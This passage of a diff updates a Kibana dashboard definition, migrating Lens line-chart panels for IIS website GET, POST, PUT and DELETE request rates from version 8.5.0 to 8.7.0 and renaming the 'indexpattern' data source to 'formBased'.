- "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "451975f8-afff-4a05-befc-dbeb807a5ad0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "c08ed31d-564a-4dac-b8dd-c5d9141f7c88": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "POST Requests ", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.post_requests_per_sec" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Bytes Received/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "4f05e422-f1be-4856-be21-9be206b34834", + "w": 12, + "x": 12, + "y": 24 + }, + "panelIndex": "4f05e422-f1be-4856-be21-9be206b34834", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-03f125d4-c99c-460e-bc11-be08f9294423", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "03f125d4-c99c-460e-bc11-be08f9294423": { + "columnOrder": [ + "4100a38e-ea34-4a66-ad4a-8abdf8d3d8a3", + "451975f8-afff-4a05-befc-dbeb807a5ad0", + "c08ed31d-564a-4dac-b8dd-c5d9141f7c88" + ], + "columns": { + "4100a38e-ea34-4a66-ad4a-8abdf8d3d8a3": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "c08ed31d-564a-4dac-b8dd-c5d9141f7c88" - ], - "layerId": "03f125d4-c99c-460e-bc11-be08f9294423", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "4100a38e-ea34-4a66-ad4a-8abdf8d3d8a3", - "xAccessor": "451975f8-afff-4a05-befc-dbeb807a5ad0", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(252,196,0,1)", - "forAccessor": "c08ed31d-564a-4dac-b8dd-c5d9141f7c88" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "451975f8-afff-4a05-befc-dbeb807a5ad0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "c08ed31d-564a-4dac-b8dd-c5d9141f7c88": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "POST Requests ", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } + } + }, + "scale": "ratio", + "sourceField": "iis.website.network.post_requests_per_sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "c08ed31d-564a-4dac-b8dd-c5d9141f7c88" + ], + "layerId": "03f125d4-c99c-460e-bc11-be08f9294423", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "4f05e422-f1be-4856-be21-9be206b34834", - "w": 12, - "x": 12, - "y": 24 - }, - "panelIndex": "4f05e422-f1be-4856-be21-9be206b34834", - "title": "POST Requests/sec", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "4100a38e-ea34-4a66-ad4a-8abdf8d3d8a3", + "xAccessor": "451975f8-afff-4a05-befc-dbeb807a5ad0", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(252,196,0,1)", + "forAccessor": "c08ed31d-564a-4dac-b8dd-c5d9141f7c88" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-a85e6389-be86-43f8-a3e8-9f8231a56b4c", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "a85e6389-be86-43f8-a3e8-9f8231a56b4c": { - "columnOrder": [ - "76fcf5e4-a16d-4094-9362-2c968d92ca14", - "a8dbd320-ac67-4c5f-ad7d-eb71735bbd7b", - "79a16408-a2dd-4f58-906f-45ccb548697c" - ], - "columns": { - "76fcf5e4-a16d-4094-9362-2c968d92ca14": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "79a16408-a2dd-4f58-906f-45ccb548697c": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "PUT Requests ", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.put_requests_per_sec" - }, - "a8dbd320-ac67-4c5f-ad7d-eb71735bbd7b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "POST Requests/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "2cfab1f4-89e9-4548-b6c0-2533bf6b536b", + "w": 12, + "x": 24, + "y": 24 + }, + "panelIndex": "2cfab1f4-89e9-4548-b6c0-2533bf6b536b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-a85e6389-be86-43f8-a3e8-9f8231a56b4c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a85e6389-be86-43f8-a3e8-9f8231a56b4c": { + "columnOrder": [ + "76fcf5e4-a16d-4094-9362-2c968d92ca14", + "a8dbd320-ac67-4c5f-ad7d-eb71735bbd7b", + "79a16408-a2dd-4f58-906f-45ccb548697c" + ], + "columns": { + "76fcf5e4-a16d-4094-9362-2c968d92ca14": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "79a16408-a2dd-4f58-906f-45ccb548697c" - ], - "layerId": "a85e6389-be86-43f8-a3e8-9f8231a56b4c", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "76fcf5e4-a16d-4094-9362-2c968d92ca14", - "xAccessor": "a8dbd320-ac67-4c5f-ad7d-eb71735bbd7b", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(211,49,21,1)", - "forAccessor": "79a16408-a2dd-4f58-906f-45ccb548697c" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + }, + "79a16408-a2dd-4f58-906f-45ccb548697c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "PUT Requests ", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } } + }, + "scale": "ratio", + "sourceField": "iis.website.network.put_requests_per_sec" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "a8dbd320-ac67-4c5f-ad7d-eb71735bbd7b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "79a16408-a2dd-4f58-906f-45ccb548697c" + ], + "layerId": "a85e6389-be86-43f8-a3e8-9f8231a56b4c", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "2cfab1f4-89e9-4548-b6c0-2533bf6b536b", - "w": 12, - "x": 24, - "y": 24 - }, - "panelIndex": "2cfab1f4-89e9-4548-b6c0-2533bf6b536b", - "title": "PUT Requests/sec", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "76fcf5e4-a16d-4094-9362-2c968d92ca14", + "xAccessor": "a8dbd320-ac67-4c5f-ad7d-eb71735bbd7b", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(211,49,21,1)", + "forAccessor": "79a16408-a2dd-4f58-906f-45ccb548697c" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9aa14584-ac2e-4743-8fbe-6522dd3f72c6", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "9aa14584-ac2e-4743-8fbe-6522dd3f72c6": { - "columnOrder": [ - "4496f59a-ae54-445e-bdeb-5684d1b0b73d", - "1ebb642b-29e8-49b5-bc8a-c526d5dc56c1", - "9639a877-1eaa-4f16-b151-d41c43410355" - ], - "columns": { - "1ebb642b-29e8-49b5-bc8a-c526d5dc56c1": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "4496f59a-ae54-445e-bdeb-5684d1b0b73d": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "9639a877-1eaa-4f16-b151-d41c43410355": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "DELETE Requests ", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.delete_requests_per_sec" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "PUT Requests/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "7ae0e0fd-c4b0-4836-8d7d-15c601312bc0", + "w": 12, + "x": 36, + "y": 24 + }, + "panelIndex": "7ae0e0fd-c4b0-4836-8d7d-15c601312bc0", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9aa14584-ac2e-4743-8fbe-6522dd3f72c6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9aa14584-ac2e-4743-8fbe-6522dd3f72c6": { + "columnOrder": [ + "4496f59a-ae54-445e-bdeb-5684d1b0b73d", + "1ebb642b-29e8-49b5-bc8a-c526d5dc56c1", + "9639a877-1eaa-4f16-b151-d41c43410355" + ], + "columns": { + "1ebb642b-29e8-49b5-bc8a-c526d5dc56c1": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "4496f59a-ae54-445e-bdeb-5684d1b0b73d": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "9639a877-1eaa-4f16-b151-d41c43410355" - ], - "layerId": "9aa14584-ac2e-4743-8fbe-6522dd3f72c6", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "4496f59a-ae54-445e-bdeb-5684d1b0b73d", - "xAccessor": "1ebb642b-29e8-49b5-bc8a-c526d5dc56c1", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(25,77,51,1)", - "forAccessor": "9639a877-1eaa-4f16-b151-d41c43410355" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "9639a877-1eaa-4f16-b151-d41c43410355": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "DELETE Requests ", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } + } + }, + "scale": "ratio", + "sourceField": "iis.website.network.delete_requests_per_sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "9639a877-1eaa-4f16-b151-d41c43410355" + ], + "layerId": "9aa14584-ac2e-4743-8fbe-6522dd3f72c6", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "7ae0e0fd-c4b0-4836-8d7d-15c601312bc0", - "w": 12, - "x": 36, - "y": 24 - }, - "panelIndex": "7ae0e0fd-c4b0-4836-8d7d-15c601312bc0", - "title": "DELETE Requests/sec", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "4496f59a-ae54-445e-bdeb-5684d1b0b73d", + "xAccessor": "1ebb642b-29e8-49b5-bc8a-c526d5dc56c1", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(25,77,51,1)", + "forAccessor": "9639a877-1eaa-4f16-b151-d41c43410355" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7861c5c5-3d3c-4822-9fd8-0a438969a9d8", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "DELETE Requests/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "97dd63e6-2e3c-45af-bab2-7b8c2ec485ce", + "w": 12, + "x": 0, + "y": 24 + }, + "panelIndex": "97dd63e6-2e3c-45af-bab2-7b8c2ec485ce", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7861c5c5-3d3c-4822-9fd8-0a438969a9d8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7861c5c5-3d3c-4822-9fd8-0a438969a9d8": { + "columnOrder": [ + "601cb08d-c29b-4337-a9f7-7f6a4befdbf3", + "1408fa39-ab30-4bdd-a0ac-438e7fd74509", + "11793948-c9e3-4dc7-b746-c42c1d00deae" + ], + "columns": { + "11793948-c9e3-4dc7-b746-c42c1d00deae": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "GET Requests ", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "7861c5c5-3d3c-4822-9fd8-0a438969a9d8": { - "columnOrder": [ - "601cb08d-c29b-4337-a9f7-7f6a4befdbf3", - "1408fa39-ab30-4bdd-a0ac-438e7fd74509", - "11793948-c9e3-4dc7-b746-c42c1d00deae" - ], - "columns": { - "11793948-c9e3-4dc7-b746-c42c1d00deae": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "GET Requests ", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.get_requests_per_sec" - }, - "1408fa39-ab30-4bdd-a0ac-438e7fd74509": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "601cb08d-c29b-4337-a9f7-7f6a4befdbf3": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.website.network.get_requests_per_sec" + }, + "1408fa39-ab30-4bdd-a0ac-438e7fd74509": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "601cb08d-c29b-4337-a9f7-7f6a4befdbf3": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "11793948-c9e3-4dc7-b746-c42c1d00deae" - ], - "layerId": "7861c5c5-3d3c-4822-9fd8-0a438969a9d8", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "601cb08d-c29b-4337-a9f7-7f6a4befdbf3", - "xAccessor": "1408fa39-ab30-4bdd-a0ac-438e7fd74509", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(252,196,0,1)", - "forAccessor": "11793948-c9e3-4dc7-b746-c42c1d00deae" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "11793948-c9e3-4dc7-b746-c42c1d00deae" + ], + "layerId": "7861c5c5-3d3c-4822-9fd8-0a438969a9d8", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "97dd63e6-2e3c-45af-bab2-7b8c2ec485ce", - "w": 12, - "x": 0, - "y": 24 - }, - "panelIndex": "97dd63e6-2e3c-45af-bab2-7b8c2ec485ce", - "title": "GET Requests/sec", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "601cb08d-c29b-4337-a9f7-7f6a4befdbf3", + "xAccessor": "1408fa39-ab30-4bdd-a0ac-438e7fd74509", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(252,196,0,1)", + "forAccessor": "11793948-c9e3-4dc7-b746-c42c1d00deae" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-dd6cafd2-1561-4ba1-9c52-011c21954dd5", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "dd6cafd2-1561-4ba1-9c52-011c21954dd5": { - "columnOrder": [ - "18aac651-4b5a-4cc9-bc07-c27539729436", - "d6c60abc-b75c-489b-8b2f-bd91c6403403", - "be40db0d-71d9-4873-801f-8465d970591c" - ], - "columns": { - "18aac651-4b5a-4cc9-bc07-c27539729436": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "be40db0d-71d9-4873-801f-8465d970591c": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total POST Requests ", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.total_post_requests" - }, - "d6c60abc-b75c-489b-8b2f-bd91c6403403": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - 